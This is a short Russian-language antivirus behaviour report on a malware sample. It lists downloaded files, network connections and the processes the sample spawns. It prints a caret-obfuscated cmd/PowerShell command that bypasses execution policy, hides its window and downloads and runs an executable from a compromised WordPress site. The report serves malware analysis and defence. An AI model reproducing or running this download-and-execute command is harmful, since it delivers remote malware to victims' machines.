Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://warnercamp.com/wp-includes/pkskkcin/nb0o37bw.exe как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "PoWE^RShel^l.eXE -^e^Xe^CuT^IO^NP^ol^icY^ ^Byp^AS^s ^-^Nopr^oFi^Le^ ^-win^DOWsT^y^Le ^Hi^Dde^n^ ^(NEw-OBJeCt^ sYs^tEM.^nEt.WebcL^iE^N^T).^DOWNloAdFI^le('http://warnercamp.com...
Сетевая активность
Подключается к
- 'wa###rcamp.com':80
- 'wa###rcamp.com':443
TCP
Запросы HTTP GET
- http://wa###rcamp.com/wp-includes/PkSKKciN/nb0O37BW.exe
- http://www.wa###rcamp.com/wp-includes/PkSKKciN/nb0O37BW.exe
Другие
- 'wa###rcamp.com':443
UDP
- DNS ASK wa###rcamp.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "PoWE^RShel^l.eXE -^e^Xe^CuT^IO^NP^ol^icY^ ^Byp^AS^s ^-^Nopr^oFi^Le^ ^-win^DOWsT^y^Le ^Hi^Dde^n^ ^(NEw-OBJeCt^ sYs^tEM.^nEt.WebcL^iE^N^T).^DOWNloAdFI^le('http://warnercamp.com...' (со скрытым окном)
